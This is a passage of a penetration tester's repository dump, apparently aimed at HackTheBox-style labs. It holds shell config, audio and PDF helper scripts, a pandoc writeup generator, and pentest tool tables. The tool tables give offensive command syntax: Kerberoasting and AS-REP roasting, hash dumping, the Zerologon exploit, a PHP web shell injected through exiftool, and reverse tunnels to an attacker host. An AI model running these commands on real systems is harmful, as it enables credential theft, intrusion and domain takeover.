PS1=\"\\[\\033[0;31m\\]\\342\\224\\214\\342\\224\\200\\$([[ \\$? != 0 ]] && echo \\\"[\\[\\033[0;31m\\]\\342\\234\\227\\[\\033[0;37m\\]]\\342\\224\\200\\\")[$(if [[ ${EUID} == 0 ]]; then echo '\\[\\033[01;31m\\]root\\[\\033[01;33m\\]@\\[\\033[01;96m\\]\\h'; else echo '\\[\\033[0;39m\\]\\u\\[\\033[01;33m\\]@\\[\\033[01;96m\\]\\h'; fi)\\[\\033[0;31m\\]]\\342\\224\\200[\\[\\033[0;32m\\]\\w\\[\\033[0;31m\\]]\\n\\[\\033[0;31m\\]\\342\\224\\224\\342\\224\\200\\342\\224\\200\\342\\225\\274 \\[\\033[0m\\]\\[\\e[01;33m\\]\\\\$\\[\\e[0m\\]\"\n    ;;\n*)\n    ;;\nesac\n\n# enable color support of ls and also add handy aliases\nif [ -x /usr/bin/dircolors ]; then\n    test -r ~/.dircolors && eval \"$(dircolors -b ~/.dircolors)\" || eval \"$(dircolors -b)\"\n    alias ls='ls --color=auto'\n    alias dir='dir --color=auto'\n    alias vdir='vdir --color=auto'\n\n    alias grep='grep --color=auto'\n    alias fgrep='fgrep --color=auto'\n    alias egrep='egrep --color=auto'\nfi\n\n# some more ls aliases\nalias ll='ls -lh'\nalias la='ls -lha'\nalias l='ls -CF'\nalias em='emacs -nw'\nalias dd='dd status=progress'\nalias _='sudo'\nalias _i='sudo -i'\nalias please='sudo'\nalias fucking='sudo'\nalias chuck_norris_says='sudo'\n\n# Alias definitions.\n# You may want to put all your additions into a separate file like\n# ~/.bash_aliases, instead of adding them here directly.\n# See /usr/share/doc/bash-doc/examples in the bash-doc package.\n\nif [ -f ~/.bash_aliases ]; then\n    . ~/.bash_aliases\nfi\n\n# enable programmable completion features (you don't need to enable\n# this, if it's already enabled in /etc/bash.bashrc and /etc/profile\n# sources /etc/bash.bashrc).\nif ! shopt -oq posix; then\n  if [ -f /usr/share/bash-completion/bash_completion ]; then\n    . /usr/share/bash-completion/bash_completion\n  elif [ -f /etc/bash_completion ]; then\n    . /etc/bash_completion\n  fi\nfi\n\n\nrt(){\n    clear && source ~/.bashrc\n    }\n"
  },
  {
    "path": "scripts/misc/fix-bg-noise-obs.sh",
    "content": "#!/bin/bash\n# Microphone Realtime background noise reduction script\n# author Luigi Maselli - https://grigio.org licence: AS-IS\n# credits: http://askubuntu.com/questions/18958/realtime-noise-removal-with-pulseaudio\n# run as: sudo && pulseaudio -k\n# source: https://gist.github.com/adrianolsk/bfa32f3227dc674eff72a2008f6c0316\n# run this and change the mic to \"BUILT IN Audio Analog\"\n\nsudo cp /etc/pulse/default.pa /etc/pulse/default.pa.bak\n# a >> redirection is opened by the user's shell, not by sudo, so append through tee to keep root privileges\nsudo tee -a /etc/pulse/default.pa >/dev/null <<EOT\nload-module module-echo-cancel source_name=noechosource sink_name=noechosink\nset-default-source noechosource\nset-default-sink noechosink\nEOT\n"
  },
  {
    "path": "scripts/misc/pdf-protect.sh",
    "content": "#!/bin/bash\n\necho Enter the directory name:\nread -r dir_\ncd \"$dir_\" || exit 1\necho enter the root hash\n# -s keeps the password out of the terminal and its scrollback\nread -rs hash_\necho\ndn=$(basename ./*.pdf)\necho The found pdf is \"$dn\"\ndnd=\"${dn%.pdf}\"\n# pdftk only takes the password on the command line, so it is visible in the process list while it runs\npdftk \"$dn\" output \"$dnd-Protected.pdf\" user_pw \"$hash_\"\n"
  },
  {
    "path": "scripts/misc/report-gen.md",
    "content": "---\ntitle: \"<title>\"\nauthor: cyberwr3nch\ndate: \"<date>\"\nsubject: \"Hackthebox writeup\"\nkeywords: [smb, ftp]\nsubtitle: \"Writeup from cyberwr3nch\"\nlang: \"en\"\ntitlepage: true\ntitlepage-color: \"000000\"\ntitlepage-text-color: \"FFFFFF\"\ntitlepage-rule-color: \"FFFFFF\"\ntitlepage-rule-height: 0\ntitlepage-background: \"tp1.jpg\"\nbook: true\nclassoption: oneside\ncode-block-font-size: \\scriptsize\n---\n\n# MainHeading\n## Subheading\n\n> text\n\n```bash\ncode code-block-font-size\n\nwhoami\n```\n\n"
  },
  {
    "path": "scripts/misc/report.sh",
    "content": "#!/bin/bash\n\n################################################################################################\n# start the markdown with a frontmatter\n# ---                                                                                                                                                                \n# title: \"Attacktive Directory [TryHackMe]\"                                                                                                                          \n# author: cyberwr3nch                                                                                                                                                \n# date: \"2021-02-21\"                                                                                                                                                 \n# subject: \"Active Directory Basics\"                                                                                                                                 \n# keywords: [ad, enum4linux, domain, domain controller, internal PT]                                                                                                 \n# subtitle: \"Basics of Active Directory Exploitation\"                                                                                                                \n# lang: \"en\"                                                                                                                                                         \n# titlepage: true                                                                                                                                                    \n# titlepage-color: \"1E90FF\"                                                                                                                                          \n# titlepage-text-color: \"000000\"                                                                                                                  
                   \n# titlepage-rule-color: \"FFFFFF\"                                                                                                                                     \n# titlepage-rule-height: 1                                                                                                                                           \n# book: true                                                                                                                                                         \n# classoption: oneside                                                                                                                                               \n# code-block-font-size: \\scriptsize                                                                                                                                  \n# ---   \n## Vim Shortcuts to include the formatter\n## Remove the start with #<space> --> :%s/^#\\s//g \n## Remove the unwanted whitespace characters --> :%s/\\s//g \n################################################################################################\n\n\n\n# variables\nRED='\\033[0;31m'\nNC='\\033[0m'\nBLUE='\\033[0;34m'\nYELLOW='\\033[1;33m'\n\n# main usage\nif [ \"$#\" -ne 2 ]; then\n    echo -e \"[${YELLOW}*${NC}] Usage: $0 <input.md> <output.pdf>\"\n    # echo \"Themes: pygments, kate, monochrome, breezeDark, espresso, zenburn, haddock, tango\"\n    # change line 73 to one of these themes\n    exit\nfi\n\n# pandoc check\necho -e \"[${YELLOW}-${NC}] Checking for availability of pandoc..\"\nif ! 
command -v pandoc &> /dev/null\nthen \n    echo -e \"[${RED}+${NC}] Pandoc not installed \\n\"\n    read -p \"Do you want to install pandoc (Y/n) ?\" -n 1 -r\n    if [[ $REPLY =~ ^[Yy]$ ]]\n    then\n        echo -e \"\\n[${BLUE}+${NC}] Installing Pandoc...\"\n        sudo apt-get install pandoc\n    else\n        echo -e \"\\n[${RED}*${NC}] pandoc not found \"\n        exit\n    fi\nelse\n     echo -e \"[${BLUE}+${NC}]Pandoc seems to be installed\"\nfi\n\n\n# texlive checking\necho -e \"[${YELLOW}-${NC}] Checking for latex installation ...\"\nif ! command -v latex &> /dev/null\nthen \n    echo -e \"[${RED}+${NC}] latex is not installed \\n\"\n    read -p \"Do you want to install texlive-full (Y/n) ? \" -n 1 -r\n    echo\n    if [[ $REPLY =~ ^[Yy]$ ]]\n    then\n        echo -e \"\\n[${BLUE}+${NC}] Installing texlive-full\"\n        sudo apt-get install texlive-full\n    else\n        echo -e \"\\n[${RED}*${NC}] Latex Not found\"\n        exit\n    fi\nelse\n     echo -e \"[${BLUE}+${NC}] latex is installed\"\nfi\n\n# esivogel check\necho -e \"[${YELLOW}-${NC}] Checking for the availability of esivogel.latex...\"\n\nif [ ! -e /usr/share/pandoc/data/templates/eisvogel.latex ];then\n    read -p \"eisvogel.latex is not want to download and intstall it (Y/n) ? 
\" -n 1 -r\n    if [[ $REPLY =~ ^[Yy]$ ]]\n    then\n        cd /tmp/; wget https://github.com/Wandmalfarbe/pandoc-latex-template/releases/download/v2.0.0/Eisvogel-2.0.0.tar.gz; tar -zxvf Eisvogel-2.0.0.tar.gz; sudo cp eisvogel.latex /usr/share/pandoc/data/templates/eisvogel.latex;\n        echo -e \"\\n[${BLUE}+${NC}] eisvogel.latex added\"\n    else\n        echo -e \"\\n[${RED}*${NC}] eisvogel.latex is not found\"\n        exit\n    fi\nelse\n    echo -e \"[${BLUE}+${NC}] eisvogel.latex is found in /usr/share/pandoc/data/templates\"    \nfi\n\n# file generate\npandoc $1 -o $2 \\\n--from markdown+yaml_metadata_block+raw_html \\\n--template eisvogel \\\n--table-of-contents \\\n--toc-depth 6 \\\n--number-sections \\\n--top-level-division=chapter \\\n--highlight-style breezeDark \n\n# output open\nif [ $? -eq 0 ];then\n    echo \"Process finished\"\n    read -p \"Do you want to open the PDF ? (Y/n) \" -n 1 -r\n    if [[ $REPLY =~ ^[Yy]$ ]];then\n        echo\n        xdg-open $2\n    else\n        echo\n        echo \"Bye Bye\"\n        echo\n        exit\n    fi\nelse\n    echo \"Bye Bye\"\nfi\n"
  },
  {
    "path": "tools/README.md",
    "content": "# Tools\n\n- Tools that I use during pentest `tools.md`\n\n#### Windows and Active Directory\n| Tool | Use | Command Syntax |\n| ---- | --- | -------------- |\n| [Bloodhound.py](https://github.com/fox-it/BloodHound.py) | BloodHound written in Python. Used to obtain AD information from a Windows machine | `python3 bloodhound-python -u <username> -p <passphrase> -ns <machineIP> -d <domainname> -c all` |\n| [Impacket](https://github.com/SecureAuthCorp/impacket) | Swiss Army knife for most Windows AD attacks | `python GetNPUsers.py <domain_name>/ -usersfile <users_file>` = ASREPRoasting <br /> `python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password>` = Kerberoasting |\n| [Kerbrute](https://github.com/ropnop/kerbrute) | A tool written in Go to enumerate AD users | `./kerbrute userenum --dc <machine ip> -d <domainname> <users_file>` |\n| [CredDump](https://github.com/moyix/creddump) | Used to obtain cached credentials, LSA secrets and password hashes when the SYSTEM and SAM hives are available | `./pwdump.py <system hive> <sam hive>` = obtain password hashes <br /> `./cachedump.py <system hive> <sam hive>` = obtain cached credentials <br /> `./lsadump.py <system hive> <sam hive>` = obtain LSA secrets |\n| [PwdDump](https://github.com/moyix/creddump) | After getting administrative access, running this dumps the password hashes | `.\\PwDump7.exe` |\n| [ApacheDirectoryStudio](https://directory.apache.org/studio/downloads.html) | LDAP browser used to analyze an LDAP instance running on Linux (creds required); here the LDAP port of the victim machine is forwarded over SSH so it can be browsed from the attacker machine | `sudo ssh -L 389:172.20.0.10:389 lynik-admin@10.10.10.189` |\n| [Windsearch](https://github.com/ropnop/go-windapsearch) | Enumerates AD objects as an authenticated user on the network, using modules | `windsearch -d spookysec.local -u 'svc-admin' -p 'management2005' -m computers` |\n\n\n#### Port Forwarding\n| Tool | Use | Command Syntax |\n| ---- | --- | -------------- |\n| [Chisel](https://github.com/jpillora/chisel) | Used to forward a service running on a port of the victim machine | `./chisel server -p <port no.> --reverse` = run on the attacker machine <br /> `./chisel client <attackerip:port> R:1234:127.0.0.1:1121` = forwards the service running on the victim's port 1121 to port 1234 on the attacker's machine |\n| [socat](https://github.com/craSH/socat) | Swiss Army knife for port forwarding | `socat TCP-LISTEN:8000,fork TCP:<machineIP>:<port>` = listens for connections on port `8000` and forwards each one to `machineIP`:`port` <br /> `socat TCP-LISTEN:9002,bind=<specific ip>,fork,reuseaddr TCP:localhost:<port>` = forwards all requests arriving on port 9002 of `<specific ip>` to the localhost port; `reuseaddr` tells socat to bind the address (e.g. localhost) even if it is already in use |\n| [plink](https://github.com/Plotkine/pentesting/blob/master/Windows_privilege_escalation/Windows-privesc-tib3rius/plink.exe) | SSH PuTTY in CLI mode | `.\\plink.exe <user@host> -R <remote port>:<localhost>:<local port>` <br /> `.\\plink.exe kali@10.10.14.32 -R 8888:127.0.0.1:8888` = forwards the service running on the victim machine's port 8888 to the attacker machine's port 8888 |\n| ssh | uses the built-in ssh client to forward a service | **Remote Port Forwarding:** <br /> > Command should be entered on the compromised machine<br />`ssh <user@host> -R <host>:<port open in host>:<localhost>:<port in victim machine> -N -f` <br /> `ssh cyberwr3nch@192.168.XX.XX -R 192.168.XX.XX:3000:127.0.0.1:80 -N -f` = opens port 3000 on cyberwr3nch's machine and forwards the service running on the victim's port 80 to it, so visiting 127.0.0.1:3000 in cyberwr3nch's browser is the same as visiting 127.0.0.1:80 on the victim machine <br /> ================ <br /> **Dynamic Port Forwarding:** <br /> > Command to be executed on the attacker machine <br /> `ssh -D <port on attacker machine> <victim@victim_machine>`<br /> `ssh -D 1234 victim@192.168.XX.XX` = run on the attacker's machine; port 1234 should then be configured in `/etc/proxychains.conf` as `socks4 127.0.0.1 1234`. If SSH dynamic port forwarding fails, go for the chisel method <br /> ================ <br /> **Local Port Forwarding:** <br /> > Command to be executed on the attacker machine <br /> `ssh -L 127.0.0.1:<port to req>:<internal ip>:<internal port> <intermediate_user@host>` <br /> `ssh -L 127.0.0.1:8080:10.10.10.11:80 cyberwr3nch@10.10.10.10` = whatever request is made to the attacker machine's port 8080 travels through 10.10.10.10 and reaches 10.10.10.11:80 <br /> `ssh -L <attacker machine port>:127.0.0.1:<port on service running> <user>@<host>` <br /> `ssh -L 443:127.0.0.1:8443 nadine@10.10.10.21` = the service running on 10.10.10.21:8443 is forwarded to the attacker machine's port 443; when port 443 is requested on the attacker's machine, the contents of 10.10.10.21:8443 are retrieved |\n\n\n#### Directory Enumeration\n| Tool | Use | Command Syntax |\n| ---- | --- | -------------- |\n| [DirSearch](https://github.com/maurosoria/dirsearch) | Directory enumeration tool | `python3 dirsearch.py -u <url> -e <extn>` |\n| [Gobuster](https://github.com/OJ/gobuster) | Directory enumeration tool written in Go | `gobuster dir -u <url> -w <wordlist> -x <extn> -b <hide status code> -t <threads>` |\n| [RustBuster](https://github.com/phra/rustbuster) | Directory enumeration tool written in Rust | `rustbuster dir -u <url> -w <wordlist> -e <extn>` |\n\n\n#### Post Exploitation\n| Tool | Use | Command Syntax |\n| ---- | --- | -------------- |\n| [LinEnum](https://github.com/rebootuser/LinEnum) | Post-exploitation script that automates enumeration | `./LinEnum.sh` |\n| [LinPeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) | Post-exploitation enumeration script | `./linpeas.sh` |\n| [WinPEASbat/WinPEASexe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) | Windows post-exploitation enumeration script (.bat) and executable | `.\\winPEAS.bat` |\n\n\n#### Misc\n| Tool | Use | Command Syntax |\n| ---- | --- | -------------- |\n| [Exiftool](https://github.com/exiftool/exiftool) | Inspects the metadata of an image; also used to inject a PHP payload into the comment field for file-upload vulns, combined with a double extension such as `file.php.ext` | `./exiftool -Comment='<?php system($_GET['cmd']); ?>' <image.ext>` |\n| [Git Dumper](https://github.com/arthaud/git-dumper) | Dumps the git repo if `.git` is found on a website | `./git-dumper.py <website/.git> <output folder>` |\n| [lxd-alpine builder](https://github.com/saghul/lxd-alpine-builder) | When the victim machine has lxc available, privesc is done with this | [`article here`](https://www.hackingarticles.in/lxd-privilege-escalation/) |\n| [Php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell) | PHP reverse shell; when an upload is possible, change the IP and make a request to obtain the reverse shell | |\n| [ZerologonPOC](https://github.com/risksense/zerologon) | CVE-2020-1472 exploit; sets the domain admin password to empty and dumps the secrets. _PS: the latest version of Impacket is required_ | `python3 set_empty_pw.py machinename/domainname machine IP; secretsdump.py -just-dc -no-pass machinename\\$@machineip` |\n| [Gopherus](https://github.com/tarunkant/Gopherus) | SSRF with the `gopher://` protocol | `gophreus --exploit phpmemcache` |\n| [pse](https://github.com/ssstonebraker/Pentest-Service-Enumeration) | Quick notes from the terminal | |\n| [Shellerator](https://github.com/ShutdownRepo/shellerator) | Quick reverse shell command generator | |\n| [Starship](https://starship.rs/guide/#%F0%9F%9A%80-installation) | Cool Bash interpreter | |\n| [bat](https://github.com/sharkdp/bat) | Colored man pages and cat | |\n| [colorls](https://github.com/athityakumar/colorls) | decorated ls | |\n| [exa](https://github.com/ogham/exa) | colored ls (JH uses it... I guess...) | |\n"
  },
  {
    "path": "tools/tools.md",
    "content": "# Tools for playing\n\n| Tool | Usage | Link |\n| ---- | ----- | ---- |\n| Bloodhound.py | BloodHound written in Python. Obtains AD information from Windows remotely | [fox-it](https://github.com/fox-it/BloodHound.py) |\n| Bloodhound | Native BloodHound, which requires neo4j and uses graphs to find vulnerabilities in AD | [BloodHoundAD](https://github.com/BloodHoundAD/BloodHound) |\n| Exiftool | Obtains metadata information from an image | [exiftool](https://github.com/exiftool/exiftool) |\n| LinEnum | Post-exploitation script which automatically looks for juicy information on the compromised machine | [rebootuser](https://github.com/rebootuser/LinEnum) |\n| Apache Directory Studio | Kind of AD for Linux | [apache directory studio](https://directory.apache.org/studio/downloads.html) |\n| Aquatone | Pass the Chrome installation path and a list of subdomains; it will automatically take a screenshot of every website and save it | [michenriksen](https://github.com/michenriksen/aquatone) |\n| Chisel | Ultimate weapon for port forwarding and pivoting | [jpillora](https://github.com/jpillora/chisel) |\n| Creddump | Obtains information from Windows registry hives | [moyix](https://github.com/moyix/creddump) |\n| DirSearch | Directory buster tool | [maurosoria](https://github.com/maurosoria/dirsearch) |\n| GitTools | Analyzes and segregates the files according to the commits | [internetwache](https://github.com/internetwache/GitTools) |\n| Gobuster | Directory buster tool written in Go | [OJ](https://github.com/OJ/gobuster) |\n| Gopherus | Tool to generate gopher payloads to bypass SSRF protection | [tarunkant](https://github.com/tarunkant/Gopherus) |\n| Impacket | Swiss Army knife repo for AD and networking stuff | [SecureAuthCorp](https://github.com/SecureAuthCorp/impacket) |\n| Kerbrute | Tool to enumerate accounts with Kerberos Pre-Auth enabled | [ropnop](https://github.com/ropnop/kerbrute/releases/latest) |\n| lxd-alpine-builder | Tool to create malicious LXC container | [saghul](https://github.com/saghul/lxd-alpine-builder) |\n| php-reverse-shell | PHP reverse shell from PentestMonkey | [pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell) |\n| plink | SSH client for Windows in the CLI | [plink](https://the.earth.li/~sgtatham/putty/latest/w32/plink.exe) |\n| rustbuster | Directory buster tool written in Rust | [phra](https://github.com/phra/rustbuster) |\n| socat | Network proxy tool with high-level functionality | [craSH](https://github.com/craSH/socat) |\n| windows-binaries | Windows binaries from the kali-linux GitLab | [kali linux](https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/) |\n| PEASS | Post-exploitation enumeration scripts for Windows/Linux | [carlospolop](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) |\n| zerologonPOC | POC for the AD vulnerability `CVE-2020-1472` | [risksense](https://github.com/risksense/zerologon) |\n| Username-Anarchy | Creates possible username combinations by permutation | [urbanadventurer](https://github.com/urbanadventurer/username-anarchy) |\n\n"
  }
]